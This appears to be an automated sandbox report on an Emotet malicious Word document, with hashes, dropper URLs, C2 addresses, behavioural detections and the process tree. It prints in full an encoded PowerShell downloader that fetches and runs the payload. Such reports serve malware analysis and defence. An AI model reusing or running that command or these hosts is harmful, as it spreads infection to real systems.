8a7c7754_OUZnG00tUJ

13-09-2021 08:56

210913-kwg75agdgp 10

05-09-2021 05:09

210905-fs9qraega4 10

max time kernel147s
max time network145s
platformwindows10_x64
resourcewin10v20210408
submitted13-09-2021 08:56

Report
Files
Registry
Network
Processes
Mutex
Misc

Target

8a7c7754_OUZnG00tUJ.doc

Filesize

176KB

Completed

13-09-2021 08:59

Score

10^/10

MD5

8a7c7754300dab0670eaf86357a5463d

SHA1

6feb3edf05a2170772cdaef20d76b7e8e07c7b81

SHA256

e9325a711e0f6f605b85898c5b507d4320e1f1dc672c68172b06cda359b5107e

Extracted

Language	ps1
Source
URLs	https://santyago.org/wp-content/0mcYS6/ http://dandyair.com/font-awesome/rOOAL/ https://www.tekadbatam.com/wp-content/AUiw/ http://kellymorganscience.com/wp-content/SCsWM/ https://tewoerd.eu/img/DALSKE/ http://mediainmedia.com/plugin_opencart2.3-master/Atye/ http://nuwagi.com/old/XLGjc/ exe.dropper https://santyago.org/wp-content/0mcYS6/ exe.dropper http://dandyair.com/font-awesome/rOOAL/ exe.dropper https://www.tekadbatam.com/wp-content/AUiw/ exe.dropper http://kellymorganscience.com/wp-content/SCsWM/ exe.dropper https://tewoerd.eu/img/DALSKE/ exe.dropper http://mediainmedia.com/plugin_opencart2.3-master/Atye/ exe.dropper http://nuwagi.com/old/XLGjc/

Extracted

Family	emotet
Botnet	Epoch2
C2	71.72.196.159:80 134.209.36.254:8080 120.138.30.150:8080 94.23.216.33:80 157.245.99.39:8080 137.59.187.107:8080 94.23.237.171:443 61.19.246.238:443 156.155.166.221:80 50.35.17.13:80 153.137.36.142:80 91.211.88.52:7080 209.141.54.221:8080 185.94.252.104:443 174.45.13.118:80 87.106.136.232:8080 62.75.141.82:80 213.196.135.145:80 188.219.31.12:80 82.80.155.43:80 187.161.206.24:80 172.91.208.86:80 124.41.215.226:80 107.5.122.110:80 200.123.150.89:443 95.179.229.244:8080 83.169.36.251:8080 1.221.254.82:80 95.213.236.64:8080 181.169.34.190:80 47.144.21.12:443 203.153.216.189:7080 89.216.122.92:80 84.39.182.7:80 94.200.114.161:80 104.236.246.93:8080 139.99.158.11:443 176.111.60.55:8080 78.24.219.147:8080 220.245.198.194:80 62.30.7.67:443 139.162.108.71:8080 104.32.141.43:80 153.232.188.106:80 93.147.212.206:80 79.137.83.50:443 96.249.236.156:443 24.43.99.75:80 75.80.124.4:80 42.200.107.142:80 110.5.16.198:80 5.196.74.210:8080 110.145.77.103:80 200.114.213.233:8080 85.152.162.105:80 5.39.91.110:7080 109.74.5.95:8080 140.186.212.146:80 37.187.72.193:8080 97.82.79.83:80 139.130.242.43:80 201.173.217.124:443 123.176.25.234:80 104.131.44.150:8080 74.208.45.104:8080 139.59.60.244:8080 120.150.60.189:80 74.219.172.26:80 219.75.128.166:80 82.225.49.121:80 85.105.205.77:8080 24.179.13.119:80 74.120.55.163:80 174.102.48.180:443 219.74.18.66:443 168.235.67.138:7080 194.187.133.160:443 78.187.156.31:80 103.86.49.11:8080 61.92.17.12:80 24.137.76.62:80 104.131.11.150:443 79.98.24.39:8080 75.139.38.211:80 162.241.242.173:8080 195.251.213.56:80 37.139.21.175:8080 46.105.131.79:8080 50.91.114.38:80 121.124.124.40:7080 74.134.41.124:80 68.188.112.97:80 137.119.36.33:80 121.7.127.163:80 87.106.139.101:8080 94.1.108.190:443 169.239.182.217:8080 71.72.196.159:80 134.209.36.254:8080 120.138.30.150:8080 94.23.216.33:80 157.245.99.39:8080 137.59.187.107:8080 94.23.237.171:443 61.19.246.238:443 156.155.166.221:80 50.35.17.13:80 153.137.36.142:80 91.211.88.52:7080 209.141.54.221:8080 185.94.252.104:443 174.45.13.118:80 87.106.136.232:8080 62.75.141.82:80 213.196.135.145:80 188.219.31.12:80 82.80.155.43:80 187.161.206.24:80 172.91.208.86:80 124.41.215.226:80 107.5.122.110:80 200.123.150.89:443 95.179.229.244:8080 83.169.36.251:8080 1.221.254.82:80 95.213.236.64:8080 181.169.34.190:80 47.144.21.12:443 203.153.216.189:7080 89.216.122.92:80 84.39.182.7:80 94.200.114.161:80 104.236.246.93:8080 139.99.158.11:443 176.111.60.55:8080 78.24.219.147:8080 220.245.198.194:80 62.30.7.67:443 139.162.108.71:8080 104.32.141.43:80 153.232.188.106:80 93.147.212.206:80 79.137.83.50:443 96.249.236.156:443 24.43.99.75:80 75.80.124.4:80 42.200.107.142:80 110.5.16.198:80 5.196.74.210:8080 110.145.77.103:80 200.114.213.233:8080 85.152.162.105:80 5.39.91.110:7080 109.74.5.95:8080 140.186.212.146:80 37.187.72.193:8080 97.82.79.83:80 139.130.242.43:80 201.173.217.124:443 123.176.25.234:80 104.131.44.150:8080 74.208.45.104:8080 139.59.60.244:8080 120.150.60.189:80 74.219.172.26:80 219.75.128.166:80 82.225.49.121:80 85.105.205.77:8080 24.179.13.119:80 74.120.55.163:80 174.102.48.180:443 219.74.18.66:443 168.235.67.138:7080 194.187.133.160:443 78.187.156.31:80 103.86.49.11:8080 61.92.17.12:80 24.137.76.62:80 104.131.11.150:443 79.98.24.39:8080 75.139.38.211:80 162.241.242.173:8080 195.251.213.56:80 37.139.21.175:8080 46.105.131.79:8080 50.91.114.38:80 121.124.124.40:7080 74.134.41.124:80 68.188.112.97:80 137.119.36.33:80 121.7.127.163:80 87.106.139.101:8080 94.1.108.190:443 169.239.182.217:8080
rsa_pubkey.plain

Discovery

Emotet

Description

Emotet is a trojan that is primarily spread through spam emails.

Tags

trojan banker emotet

Process spawned unexpected child process

powershell.exe

Description

This typically indicates the parent process was compromised via an exploit or macro.

Reported IOCs

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3604	2448	powershell.exe

Emotet Payload

Description

Detects Emotet payload in memory.

Reported IOCs

resource	yara_rule
behavioral2/memory/4648-390-0x00000000021B0000-0x00000000021C2000-memory.dmp	emotet
behavioral2/memory/4648-393-0x00000000021D0000-0x00000000021E0000-memory.dmp	emotet
behavioral2/memory/4648-395-0x00000000001E0000-0x00000000001EF000-memory.dmp	emotet
behavioral2/memory/4752-398-0x00000000004C0000-0x00000000004D2000-memory.dmp	emotet
behavioral2/memory/4752-401-0x00000000004E0000-0x00000000004F0000-memory.dmp	emotet

Blocklisted process makes network request

powershell.exe

Reported IOCs

flow	pid	process
19	3604	powershell.exe
22	3604	powershell.exe
32	3604	powershell.exe
34	3604	powershell.exe
36	3604	powershell.exe
38	3604	powershell.exe
40	3604	powershell.exe

Downloads MZ/PE file
Executes dropped EXE
Dzdsyqxb.exeKBDOLCH.exe

Reported IOCs

pid process

4648 Dzdsyqxb.exe
4752 KBDOLCH.exe
Drops file in System32 directory
Dzdsyqxb.exe

Reported IOCs

description ioc process

File opened for modification C:\Windows\SysWOW64\Windows.Gaming.XboxLive.Storage\KBDOLCH.exe Dzdsyqxb.exe
Enumerates physical storage devices

Description

Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

TTPs

System Information Discovery

pid	process
4648	Dzdsyqxb.exe
4752	KBDOLCH.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\Windows.Gaming.XboxLive.Storage\KBDOLCH.exe	Dzdsyqxb.exe

Checks processor information in registry

WINWORD.EXE

Description

Processor information is often read in order to detect sandboxing environments.

TTPs

Query RegistrySystem Information Discovery

Reported IOCs

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry

WINWORD.EXE

TTPs

Query RegistrySystem Information Discovery

Reported IOCs

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener
WINWORD.EXE

Reported IOCs

pid process

1456 WINWORD.EXE
1456 WINWORD.EXE

pid	process
1456	WINWORD.EXE
1456	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses

powershell.exeKBDOLCH.exe

Reported IOCs

pid	process
3604	powershell.exe
3604	powershell.exe
3604	powershell.exe
4752	KBDOLCH.exe
4752	KBDOLCH.exe
4752	KBDOLCH.exe
4752	KBDOLCH.exe
4752	KBDOLCH.exe
4752	KBDOLCH.exe
4752	KBDOLCH.exe
4752	KBDOLCH.exe
4752	KBDOLCH.exe
4752	KBDOLCH.exe
4752	KBDOLCH.exe
4752	KBDOLCH.exe

Suspicious use of AdjustPrivilegeToken
powershell.exe

Reported IOCs

description pid process

Token: SeDebugPrivilege 3604 powershell.exe
Suspicious use of SetWindowsHookEx
WINWORD.EXE

Reported IOCs

pid process

1456 WINWORD.EXE
1456 WINWORD.EXE
1456 WINWORD.EXE
1456 WINWORD.EXE
1456 WINWORD.EXE
1456 WINWORD.EXE
1456 WINWORD.EXE

description	pid	process
Token: SeDebugPrivilege	3604	powershell.exe

pid	process
1456	WINWORD.EXE
1456	WINWORD.EXE
1456	WINWORD.EXE
1456	WINWORD.EXE
1456	WINWORD.EXE
1456	WINWORD.EXE
1456	WINWORD.EXE

Suspicious use of WriteProcessMemory

powershell.exeDzdsyqxb.exe

Reported IOCs

description	pid	process	target process
PID 3604 wrote to memory of 4648	3604	powershell.exe	Dzdsyqxb.exe
PID 3604 wrote to memory of 4648	3604	powershell.exe	Dzdsyqxb.exe
PID 3604 wrote to memory of 4648	3604	powershell.exe	Dzdsyqxb.exe
PID 4648 wrote to memory of 4752	4648	Dzdsyqxb.exe	KBDOLCH.exe
PID 4648 wrote to memory of 4752	4648	Dzdsyqxb.exe	KBDOLCH.exe
PID 4648 wrote to memory of 4752	4648	Dzdsyqxb.exe	KBDOLCH.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\8a7c7754_OUZnG00tUJ.doc" /o ""

Checks processor information in registry
Enumerates system info in registry
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx

PID:1456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -en JABUADEAeAB5AHkAeQB4AD0AKAAoACcASwAnACsAJwBrAHkAbQAnACkAKwAoACcAXwA0ACcAKwAnAGsAJwApACkAOwAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABFAG4AVgA6AFUAUwBFAHIAUABSAE8ARgBpAEwAZQBcAHUANgB3ADcATwBfAGwAXABQAFMAagBrADMAcABOAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQASQBSAEUAQwB0AE8AUgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAAZQBjAFUAUgBpAGAAVABgAHkAUAByAG8AVABvAGMAYABvAEwAIgAgAD0AIAAoACgAJwB0ACcAKwAnAGwAcwAxADIAJwApACsAJwAsACAAJwArACgAJwB0ACcAKwAnAGwAcwAxADEAJwApACsAJwAsACcAKwAoACcAIAB0ACcAKwAnAGwAcwAnACkAKQA7ACQARQByAG8AcwAzAGYAYwAgAD0AIAAoACgAJwBEACcAKwAnAHoAZAAnACkAKwAoACcAcwAnACsAJwB5AHEAeABiACcAKQApADsAJABHAHIAdgBuAGYAcwAzAD0AKAAoACcARAAzAGIAcwAnACsAJwBvACcAKQArACcAbQBmACcAKQA7ACQAQQBrADEAYwBkAHcAcQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnAEYAJwArACcAeAAnACsAJwAyAFUAJwArACcANgB3ADcAbwBfAGwAJwApACsAJwBGACcAKwAoACcAeAAnACsAJwAyAFAAcwBqACcAKQArACcAawAnACsAJwAzACcAKwAnAHAAJwArACgAJwBuACcAKwAnAEYAeAAnACkAKwAnADIAJwApAC0AUgBFAHAAbABhAGMARQAgACAAKAAnAEYAeAAnACsAJwAyACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACsAJABFAHIAbwBzADMAZgBjACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABZAHMAZQBtAF8AcwA0AD0AKAAoACcATgAnACsAJwBnAGMAJwApACsAJwBtADcAJwArACcAdgBrACcAKQA7ACQATgBjADIAeQAwAG8AMgA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAATgBFAFQALgB3AGUAYgBjAGwAaQBlAG4AdAA7ACQASAA1AHQANQA1AG8AawA9ACgAJwBoAHQAJwArACcAdAAnACsAKAAnAHAAcwA6ACcAKwAnAC8ALwBzACcAKwAnAGEAJwApACsAJwBuAHQAJwArACgAJwB5AGEAJwArACcAZwAnACkAKwAoACcAbwAuAG8AcgBnACcAKwAnAC8AJwApACsAJwB3ACcAKwAoACcAcAAtAGMAbwBuACcAKwAnAHQAJwApACsAJwBlAG4AJwArACcAdAAvACcAKwAoACcAMABtACcAKwAnAGMAWQBTADYAJwApACsAKAAnAC8AJwArACcAKgBoAHQAJwApACsAKAAnAHQAcAAnACsAJwA6AC8ALwBkACcAKQArACcAYQAnACsAKAAnAG4AZAAnACsAJwB5ACcAKQArACcAYQBpACcAKwAnAHIALgAnACsAJwBjAG8AJwArACgAJwBtAC8AZgBvACcAKwAnAG4AdAAnACsAJwAtAGEAJwApACsAKAAnAHcAJwArACcAZQBzAG8AbQAnACkAKwAoACcAZQAvAHIAJwArACcATwAnACkAKwAoACcATwAnACsAJwBBACcAKwAnAEwALwAqAGgAdAB0ACcAKQArACgAJwBwAHMAOgAvACcAKwAnAC8AdwB3AHcALgAnACsAJwB0AGUAawAnACsAJwBhAGQAYgBhAHQAYQBtAC4AYwBvACcAKQArACgAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwAnACkAKwAoACcAbgB0ACcAKwAnAGUAJwApACsAJwBuACcAKwAnAHQALwAnACsAKAAnAEEAVQBpACcAKwAnAHcALwAnACkAKwAoACcAKgBoACcAKwAnAHQAdABwACcAKwAnADoALwAvAGsAJwArACcAZQAnACkAKwAoACcAbABsACcAKwAnAHkAJwApACsAJwBtACcAKwAoACcAbwByAGcAYQBuACcAKwAnAHMAYwAnACsAJwBpAGUAJwApACsAJwBuAGMAJwArACgAJwBlAC4AJwArACcAYwAnACkAKwAoACcAbwBtAC8AdwAnACsAJwBwAC0AYwAnACsAJwBvACcAKQArACgAJwBuAHQAJwArACcAZQAnACkAKwAoACcAbgAnACsAJwB0AC8AUwAnACkAKwAoACcAQwBzACcAKwAnAFcATQAvACcAKwAnACoAaAB0AHQAcAAnACkAKwAoACcAcwA6AC8AJwArACcALwB0ACcAKQArACcAZQAnACsAKAAnAHcAbwAnACsAJwBlACcAKQArACcAcgAnACsAJwBkACcAKwAnAC4AJwArACcAZQB1ACcAKwAoACcALwAnACsAJwBpAG0AZwAvAEQAQQAnACsAJwBMAFMAJwApACsAJwBLACcAKwAnAEUAJwArACgAJwAvACcAKwAnACoAaAB0AHQAcAAnACkAKwAoACcAOgAnACsAJwAvAC8AJwApACsAKAAnAG0AZQAnACsAJwBkACcAKQArACcAaQBhACcAKwAoACcAaQBuACcAKwAnAG0AZQAnACkAKwAoACcAZABpACcAKwAnAGEAJwApACsAJwAuAGMAJwArACgAJwBvAG0ALwAnACsAJwBwAGwAJwApACsAJwB1ACcAKwAoACcAZwBpAG4AXwBvAHAAJwArACcAZQBuACcAKQArACgAJwBjAGEAcgB0ACcAKwAnADIAJwApACsAKAAnAC4AMwAtACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAcwB0ACcAKwAnAGUAcgAvACcAKQArACgAJwBBAHQAeQAnACsAJwBlAC8AKgBoACcAKwAnAHQAJwApACsAJwB0ACcAKwAoACcAcAAnACsAJwA6AC8ALwAnACkAKwAoACcAbgB1AHcAYQAnACsAJwBnAGkALgBjAG8AJwArACcAbQAvAG8AbAAnACsAJwBkACcAKwAnAC8AWABMAEcAagBjAC8AJwApACkALgAiAHMAUABgAEwAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUAAxAHAAZwBiAGwAagA9ACgAKAAnAFgAaQAnACsAJwA2ACcAKQArACgAJwBiACcAKwAnAGkAaQAyACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQAWABoAHoANwBuAGsAbQAgAGkAbgAgACQASAA1AHQANQA1AG8AawApAHsAdAByAHkAewAkAE4AYwAyAHkAMABvADIALgAiAGQAbwBXAE4ATABPAGAAQQBkAGYASQBgAEwAZQAiACgAJABYAGgAegA3AG4AawBtACwAIAAkAEEAawAxAGMAZAB3AHEAKQA7ACQAWQBrADEAMABzADEAXwA9ACgAKAAnAFMAJwArACcAbgA1ADAAcAAnACkAKwAnAHAAagAnACkAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAQQBrADEAYwBkAHcAcQApAC4AIgBsAGUAbgBgAEcAdABoACIAIAAtAGcAZQAgADMAMQAyADMAOQApACAAewAmACgAJwBJAG4AdgAnACsAJwBvACcAKwAnAGsAZQAtAEkAdAAnACsAJwBlAG0AJwApACgAJABBAGsAMQBjAGQAdwBxACkAOwAkAFkAOAB6ADkAMABnAHgAPQAoACgAJwBJAHEAMgAnACsAJwB5ACcAKQArACgAJwAzAF8AJwArACcAawAnACkAKQA7AGIAcgBlAGEAawA7ACQAUwBvAHYANwBsAHYANwA9ACgAJwBSACcAKwAnAHMAJwArACgAJwB6ACcAKwAnAHIAawBuAHIAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEgAdQBrAGwAYwBxAF8APQAoACgAJwBCADEAZwAnACsAJwBrACcAKQArACcAaQAnACsAJwBkADkAJwApAA==

Process spawned unexpected child process
Blocklisted process makes network request
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory

PID:3604

C:\Users\Admin\U6w7o_l\Psjk3pn\Dzdsyqxb.exe

"C:\Users\Admin\U6w7o_l\Psjk3pn\Dzdsyqxb.exe"

Executes dropped EXE
Drops file in System32 directory
Suspicious use of WriteProcessMemory

PID:4648

C:\Windows\SysWOW64\Windows.Gaming.XboxLive.Storage\KBDOLCH.exe

"C:\Windows\SysWOW64\Windows.Gaming.XboxLive.Storage\KBDOLCH.exe"

Executes dropped EXE
Suspicious behavior: EnumeratesProcesses

PID:4752

Collection

Command and Control

Credential Access

Defense Evasion

Discovery

Execution

Exfiltration

Impact

Initial Access

Lateral Movement

Persistence

Privilege Escalation

00:00 00:00

C:\Users\Admin\U6w7o_l\Psjk3pn\Dzdsyqxb.exe
MD5
3c429a72611aa11d54a78008d531e232

SHA1
66979ad58f8447912d1c6b1195e22fd5e5aa7dd5

SHA256
ef503d5f5a41649720ea8bd5ed226aff3927ecd4c8fd80666ac2fda9d1c2e6cf

SHA512
9c6b021bb99e2530eab6d9896c5f08ad1a5185e75f4de447be0c4a39ba800762dbd7b1ad68662c07cf596099c5107f011336b0226e469f6f86e1d42043eacb85

Download Submit
C:\Users\Admin\u6w7O_l\PSjk3pN\Dzdsyqxb.exe
MD5
3c429a72611aa11d54a78008d531e232

SHA1
66979ad58f8447912d1c6b1195e22fd5e5aa7dd5

SHA256
ef503d5f5a41649720ea8bd5ed226aff3927ecd4c8fd80666ac2fda9d1c2e6cf

SHA512
9c6b021bb99e2530eab6d9896c5f08ad1a5185e75f4de447be0c4a39ba800762dbd7b1ad68662c07cf596099c5107f011336b0226e469f6f86e1d42043eacb85

Download Submit
C:\Windows\SysWOW64\Windows.Gaming.XboxLive.Storage\KBDOLCH.exe
MD5
3c429a72611aa11d54a78008d531e232

SHA1
66979ad58f8447912d1c6b1195e22fd5e5aa7dd5

SHA256
ef503d5f5a41649720ea8bd5ed226aff3927ecd4c8fd80666ac2fda9d1c2e6cf

SHA512
9c6b021bb99e2530eab6d9896c5f08ad1a5185e75f4de447be0c4a39ba800762dbd7b1ad68662c07cf596099c5107f011336b0226e469f6f86e1d42043eacb85

Download Submit
memory/1456-123-0x00007FF89BB20000-0x00007FF89DA15000-memory.dmp

Download
memory/1456-119-0x00007FF882460000-0x00007FF882470000-memory.dmp

Download
memory/1456-118-0x00007FF8A3BD0000-0x00007FF8A66F3000-memory.dmp

Download
memory/1456-122-0x000002BB4CC70000-0x000002BB4DD5E000-memory.dmp

Download
memory/1456-117-0x00007FF882460000-0x00007FF882470000-memory.dmp

Download
memory/1456-275-0x000002BB5D1E0000-0x000002BB5D1E4000-memory.dmp

Download
memory/1456-465-0x00007FF882460000-0x00007FF882470000-memory.dmp

Download
memory/1456-464-0x00007FF882460000-0x00007FF882470000-memory.dmp

Download
memory/1456-463-0x00007FF882460000-0x00007FF882470000-memory.dmp

Download
memory/1456-116-0x00007FF882460000-0x00007FF882470000-memory.dmp

Download
memory/1456-115-0x00007FF882460000-0x00007FF882470000-memory.dmp

Download
memory/1456-114-0x00007FF882460000-0x00007FF882470000-memory.dmp

Download
memory/1456-466-0x00007FF882460000-0x00007FF882470000-memory.dmp

Download
memory/3604-311-0x0000021F07876000-0x0000021F07878000-memory.dmp

Download
memory/3604-289-0x0000021F07870000-0x0000021F07872000-memory.dmp

Download
memory/3604-284-0x0000021F1FB30000-0x0000021F1FB31000-memory.dmp

Download
memory/3604-280-0x0000021F077F0000-0x0000021F077F1000-memory.dmp

Download
memory/3604-290-0x0000021F07873000-0x0000021F07875000-memory.dmp

Download
memory/4648-390-0x00000000021B0000-0x00000000021C2000-memory.dmp

Download
memory/4648-393-0x00000000021D0000-0x00000000021E0000-memory.dmp

Download
memory/4648-395-0x00000000001E0000-0x00000000001EF000-memory.dmp

Download
memory/4648-386-0x0000000000000000-mapping.dmp

Download
memory/4752-398-0x00000000004C0000-0x00000000004D2000-memory.dmp

Download
memory/4752-401-0x00000000004E0000-0x00000000004F0000-memory.dmp

Download
memory/4752-396-0x0000000000000000-mapping.dmp

Download

8a7c7754_OUZnG00tUJ

Extracted

Extracted

Filter: none

Description

Tags

Description

Reported IOCs

Description

Reported IOCs

Reported IOCs

Reported IOCs

Reported IOCs

Description

TTPs

Description

TTPs

Reported IOCs

TTPs

Reported IOCs

Reported IOCs

Reported IOCs

Reported IOCs

Reported IOCs

Reported IOCs

Title